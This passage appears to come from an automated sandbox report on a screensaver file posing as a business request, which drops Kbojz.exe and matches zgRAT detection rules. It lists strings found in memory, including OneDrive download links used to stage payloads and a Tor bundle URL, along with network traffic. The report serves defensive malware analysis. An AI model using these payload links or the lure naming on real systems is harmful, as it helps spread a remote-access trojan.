                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://l-0003.l-msedge.net
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.000000000246E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onedrive.live.com
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://s.symcd.com06
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://s2.symcb.com0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://utqurw.am.files.1drv.com
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://www.apple.com/
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434522188.0000000006180000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: Uwdvtizbx.tmpdb.2.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/0-1508238359936
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/1-1508238359942
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/2-1508238359945
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/3-1508238359948
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/4-1508238359950
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: Kbojz.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.472630617.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000213C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002444000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002465000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
                    Source: Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.drString found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=
                    Source: Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002128000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.am.files.1drv.com
                    Source: Kbojz.exe, 00000004.00000002.420766544.00000000022C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.am.files.1drv.com/y4mAdtlexFWsAsM5m_v175jQDQZ3JlPlheZX222y4JutpDgoqJHt5wLr_wX4GD45dXi
                    Source: Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiU
                    Source: Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9va
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skydrive.live.com
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002466000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skydrive.live.com/redir.aspx?resid=26943FEBC022618F%21481&avres=Infected&averror=SUCCESS&vin
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utqurw.am.files.1drv.com
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1Eantad
                    Source: Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6
                    Source: Buyeg.tmpdb.2.drString found in binary or memory: https://www.google.com/favicon.ico
                    Source: Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/search?q=net
                    Source: Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                    Source: Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/search?q=wmf
                    Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000023F8000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002418000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/sorry/index
                    Source: Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                    Source: Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                    Source: Kbojz.exe, 00000006.00000002.482725847.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.drString found in binary or memory: https://www.google.com/sorry/indextest
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/customize/gro.allizom.www.
                    Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.drString found in binary or memory: https://www.mozilla.org/en-US/firefox/help/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.41.11:443 -> 192.168.2.22:49184 version: TLS 1.2
                    Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scrWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Kbojz.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
